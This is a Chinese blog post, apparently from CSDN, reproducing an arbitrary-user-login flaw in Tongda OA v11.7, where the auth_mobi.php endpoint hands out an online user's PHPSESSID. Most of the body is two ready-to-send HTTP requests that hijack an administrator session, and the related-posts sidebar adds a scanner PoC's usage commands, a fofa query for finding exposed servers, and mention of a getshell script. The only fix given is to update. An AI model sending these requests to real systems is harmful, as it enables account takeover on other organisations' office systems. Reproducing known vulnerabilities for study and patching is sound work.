通达V11.7auth_mobi.php任意用户登录漏洞复现

已于 2023-06-21 17:54:01 修改
阅读量691 收藏 2
点赞数
分类专栏: 经验分享 渗透测试 网络安全 文章标签: web安全 渗透测试 网络安全
于 2023-06-19 15:13:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44828901/article/details/131288116
版权
警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!

一、漏洞原理

通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。

二、漏洞复现

通过访问/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0这个url

 请求包

GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=a3saos15brp65uqgk4mrqmqmg5
Connection: close

 获取需要的phpsession值(如下图)

访问ip:port/general/index.php 如下图

 请求包如下(注:浏览器默认会保存cookie,当然也会自动保存上一步获取到的PHPSESSID,下面的请求包可不用替换PHPSESSID,访问的时候会以上面获取到的PHPSESSID用户身份进行访问,所以复现此漏洞时,可全程不开burp进行抓包改包,只需要打开浏览器访问两个页面即可。)

GET /general/index.php HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=a3saos15brp65uqgk4mrqmqmg5
Connection: close

任意用户登录成功

 三、修复建议

更新至最新安全版本。

Kepler开普勒
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现-通达OA通达OA auth_mobi.php在线用户登录漏洞
xiaokp7的博客
08-03 665
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
TongDa_Scan:通达OA在线用户登录poc
03-13
进攻简述 通达OA v11.7中存在某接口查询在线用户,当用户在线时会返回PHPSESSION实现可登录后台系统 影响版本 通达OA <v11.7 进攻利用 检测当前用户是否存在线 http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 不在线在线显示RELOGIN 在线 在线页面空白,但已拿到SESSION 设置Cookie可直接登录后台 http://127.0.0.1/general/index.php 工具利用 # 指定 URL python3 .\TongDa_Scan.py -u 127.0.0.1 # 指定 uid 进行扫描 python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1 # 批量扫描,默认扫描UID为1 python3 .\TongDa_Scan.py -f .
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2144
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
qq_44005305的博客
02-11 910
在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊。
request_key_auth.rar__auth.requestToken
09-14
Request key authorisation token key definition for linux.
wegame_auth.dll
09-23
wegame_auth.dll
sqljdbc_auth.dll 支持64位
03-11
sqljdbc_auth.dll 支持64位,在Java程序使用SSL加密方式连接到sqlserver时非常有用。
sqljdbc_auth.dll.重命名x86
03-12
sqljdbc_auth.dll 支持32位系统,在Java程序使用SSL加密方式连接到sqlserver时非常有用。
逻辑漏洞任意用户登陆漏洞
zhangge3663的博客
03-13 4653
环境 环境: Webphpstudy 5.4.45 System: Windows 10x64 源码版本为:vlcms_1.2.0 什么是任意用户登录漏洞 几乎每个网站都有自己的会员系统,有会员,就有登录机制,如果可以登录其他用户账户,那么就可以窃取其他用户的资料数据。如果配合上脚本的话,甚至可以批量获取用户的数据。对网站来说,任意用户登录是一个很高危的漏洞。 环境搭建 imag...
漏洞复现通达OA v11.7 在线任意用户登录漏洞
Adminxe的博客
03-08 6076
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断。 具体fofa语法放在下面: app="TDXK-通达OA" 0x01 在线用户判断 访问 : http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 如果页面时空白的,则说明管理员在线,即可以利用 如果显示RELOGIN,则不...
漏洞思路分享-任意用户登录
qq_52612931的博客
04-07 1216
记录一次渗透项目中的任意用户登录漏洞的挖掘过程,希望大家多多指点。
通达OA11.7任意用户登录
qq_51950323的博客
05-08 517
通达OA11.7任意用户登录,需要admin用户在线,即可利用该漏洞
通达OA v11.7 在线用户登录漏洞附自写poc
yiiiing的博客
03-05 4058
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、漏洞描述二、漏洞影响三、漏洞复现四、漏洞利用POC五、总结 本文就介绍了通达OA v11.7 在线用户登录漏洞利用方法,及自己写得poc。 提示:以下是本篇文章正文内容,下面案例可供参考 一、漏洞描述 通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。 二、漏洞影响 通达OA < v11.7 三、漏
网站安全检测服务之PHP代码的后台绕过登录漏洞
网站安全专家
06-06 7758
针对于PHP代码的开发的网站,最近在给客户做网站安全检测的同时,大大小小的都会存在网站的后台管理页面被绕过并直接登录后台的漏洞,而且每个网站的后台被绕过的方式都不一样,根据SINE安全渗透测试多年来经验,来总结一下网站后台绕过的一些详情,以及该如何去防范后台被绕过,做好网站的安全部署。  后台验证码缺乏安全验证  比如在axublog程序中,网站后台存在一个验证管理员登录的一个函数chkadcoo...
任意用户登录漏洞挖掘思路
最新发布
jennycisp的博客
12-11 941
任意用户登录漏洞以利用漏洞利用难度低、危害高、奖金高已经成为src/众测漏洞挖掘中的香饽饽,本文将分享一下众测/src中任意用户登录漏洞的挖掘思路。CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享。
通达OA11.7 漏洞 任意用户登录
ShenZ的博客
07-28 995
1.获取在线用户的cookie IP/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 uid=1为管理员,也可以通过爆破获取其他用户cookie 访问该路径,如果显示relogin则该用户没有登录,没有回显可以得到cookie 2.修改cookie登录 抓包找到校验的地方(下包为logincheck.php),修改为得到的cookie POST /logincheck.php HTTP/1.1 Host: ***** User-Agent: M
php 登录漏洞,PHPCMS用户登陆SQL注入漏洞分析
weixin_33856590的博客
03-11 1270
0x00 简述之前manning在调漏洞的时候,突然发现正常登陆不上去了,当时帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~0x01 漏洞原理我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的data内容,...
ngx_mail_auth_http_module.c
05-20
ngx_mail_auth_http_module.c 是一个 Nginx 的邮件认证模块,它允许通过 HTTP 请求进行邮件认证。具体来说,当客户端尝试使用 SMTP 或 POP3 连接到后端的邮件服务器时,该模块会将认证请求转发到指定的 HTTP 服务器,并等待该服务器的响应。如果认证成功,该模块将允许客户端继续访问邮件服务器。 该模块的代码实现主要包括以下几个部分: 1. 定义模块配置项结构体 ngx_mail_auth_http_conf_t,用于保存模块配置信息。 2. 实现模块初始化函数 ngx_mail_auth_http_init_module,用于注册模块并指定模块处理邮件认证请求的回调函数。 3. 实现模块配置项解析函数 ngx_mail_auth_http_merge_conf,用于将配置项合并到模块配置结构体中。 4. 实现模块处理邮件认证请求的回调函数 ngx_mail_auth_http_handler,该函数会将认证请求转发到指定的 HTTP 服务器,并等待该服务器的响应。如果认证成功,则允许客户端继续访问邮件服务器;否则,拒绝客户端访问。 总的来说,ngx_mail_auth_http_module.c 实现了一个邮件认证模块,它可以与 Nginx 邮件代理模块一起使用,提供完整的邮件服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值